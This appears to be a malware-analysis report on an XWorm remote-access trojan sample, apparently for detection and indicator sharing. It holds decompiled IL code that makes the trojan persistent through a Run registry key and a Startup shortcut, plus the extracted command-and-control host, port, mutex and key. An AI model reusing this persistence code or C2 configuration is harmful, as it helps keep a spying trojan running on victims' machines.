Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::jFENvf3HCG5hHYJpacvEnp8L5zhYz6Gsk4ibJCNg8IjpUSQBBz4pjNEHlo2FDSETw9h2pPXKIREXz9pcm6() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::jFENvf3HCG5hHYJpacvEnp8L5zhYz6Gsk4ibJCNg8IjpUSQBBz4pjNEHlo2FDSETw9h2pPXKIREXz9pcm6() call System.Boolean Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::jFENvf3HCG5hHYJpacvEnp8L5zhYz6Gsk4ibJCNg8IjpUSQBBz4pjNEHlo2FDSETw9h2pPXKIREXz9pcm6() brtrue.s IL_00D8: call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::3mlFBjkWoZTi0zzvlooFVWgDAs5peDsv0hH25mRgUENsHMK3l() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::3mlFBjkWoZTi0zzvlooFVWgDAs5peDsv0hH25mRgUENsHMK3l() leave.s IL_00EE: call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::O7FB8E7eYln6BbgBRYifZ6bnOal8z0o9yPziMRUgUS58io7hk() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00EE: call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::O7FB8E7eYln6BbgBRYifZ6bnOal8z0o9yPziMRUgUS58io7hk() call System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::O7FB8E7eYln6BbgBRYifZ6bnOal8z0o9yPziMRUgUS58io7hk() ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::DcELFkY37yTU2ByWObmPywpnWoa8fp5EIOUspjp4qQMc34t9p ldstr \ ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_5 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0135: ldloc.0 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_014C: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_6 ldloc.s V_6 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::xk4x03sShaQJhD9CHihnc7o1m6yBr1KvG4Vbw5Yh4EWvWUNFxL8kkGt3dTFneJAGFuMgGXlu56FUUasXNh call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0177: call My.WaANjR9ICPtzOcua5 My.mihIJ03wLdnJstRyY::b9gui9e4oxyXdlwjRzTIYPjUrAckWjvGla29DRYPJGNlEqUUP() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0177: call My.WaANjR9ICPtzOcua5 My.mihIJ03wLdnJstRyY::b9gui9e4oxyXdlwjRzTIYPjUrAckWjvGla29DRYPJGNlEqUUP() call My.WaANjR9ICPtzOcua5 My.mihIJ03wLdnJstRyY::b9gui9e4oxyXdlwjRzTIYPjUrAckWjvGla29DRYPJGNlEqUUP() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_01B2: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01B2: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String cJ09sXIeNYHwNMt8WbjLYGQHDSGYZCOW4eGqx18PDxdxeW1ZR::feaaKCM3HlLbXR97QUx0nlU9Sk06MmlUKqucab41HEgvOiXyI call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_9 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_11 ldloc.s V_11 ldc.i4.0 <null> ldloc.s V_9 stelem.ref <null> ldloc.s V_11 stloc.s V_12 ldloc.s V_12 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_13 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_13 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0237: stloc.s V_14 ldloc.s V_12 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_9 stloc.s V_14 ldloc.s V_14 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_15 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_14 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_15 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_14 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_14 ldloc.s V_9 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::nw35b3R4FyiRtISPL8ustsD82ufpNQPS1gCnGbzCfHtwN5JDzKJeNPe6DGt0P2xokEHDNlGowqT7QQPmam leave.s IL_02B6: call System.Void Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::fOf6HZGqyWaEBglWf9Ws8PERSzsXmFBqyKjFBfRTIY6cQEfsiGTh6TMhacymmKjz3dp4GzPFEw1WkelGqF() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02B6: call System.Void Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::fOf6HZGqyWaEBglWf9Ws8PERSzsXmFBqyKjFBfRTIY6cQEfsiGTh6TMhacymmKjz3dp4GzPFEw1WkelGqF() call System.Void Stub.OKMBUQEzdVwxtbCPeF6kuABBuufwlsYPrZfV7xAYzk8VulKOges5e0Ri9rLaxMVKgRdMOYS1B0Fc8SufEY::fOf6HZGqyWaEBglWf9Ws8PERSzsXmFBqyKjFBfRTIY6cQEfsiGTh6TMhacymmKjz3dp4GzPFEw1WkelGqF() call System.String Stub.o7K3DNlY1e4PBATzU5GLcIrXuMHmWfKFcQCfvsazBMD7oeMvE::aFQhSya8vWl6rYdUpqnanDdhvDEPbSuKUaqwvCNi8xmG8S1Fo() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02CC: ldnull call System.Void Stub.6qABNm9Eawkj2BTTuA0lQIOfzTUdWEsky8HVK7L8eImzXKmGaBItcyCaMAko4f1p3gECYbmlNLwFbgM2g2::xqLvPK5CEjnS01Qzd0Rrgezd0HBK1FGNWzeDywiWAdDNlqjFoodqzKUrSv7Gt3tiwl716XctsAfNfi4KuX() ldnull <null> ldftn System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::J2mzC5K0QoGQ11wLKr3G0A5dU71hKAQNqTF1AeHHgcbG0Zpod() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.bCSxT7gTvYUCKFpR0bnD37dzk7GJZmuWudXLv3ieElWKGYwOh::CT50g2TdzvGpuE5w3YtollVaet9dtA5FOiulYNMmuvKVLkZye() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
|
Name0 | Value |
|---|---|
| Mutex | 7ZDcrj40gm82RuB6 |
| CnC | industrial-vegetation.gl.at.ply.gg |
| Port | 59863 |
|
Config. Field0 | Value |
|---|---|
| Mutex | 7ZDcrj40gm82RuB6 |
| Hosts | industrial-vegetation.gl.at.ply.gg |
| Port | 59863 |
| KEY | <123456789> |
| USBNM | <Xwormmm> |
| LoggerPath | %AppData% |
| family | xworm |
|
Name0 | Value | Location |
|---|---|---|
| Mutex | 7ZDcrj40gm82RuB6 Malicious |
515eddac9f486405ee522dc0da7ac766 |
| CnC | industrial-vegetation.gl.at.ply.gg Malicious |
515eddac9f486405ee522dc0da7ac766 |
| Port | 59863 Malicious |
515eddac9f486405ee522dc0da7ac766 |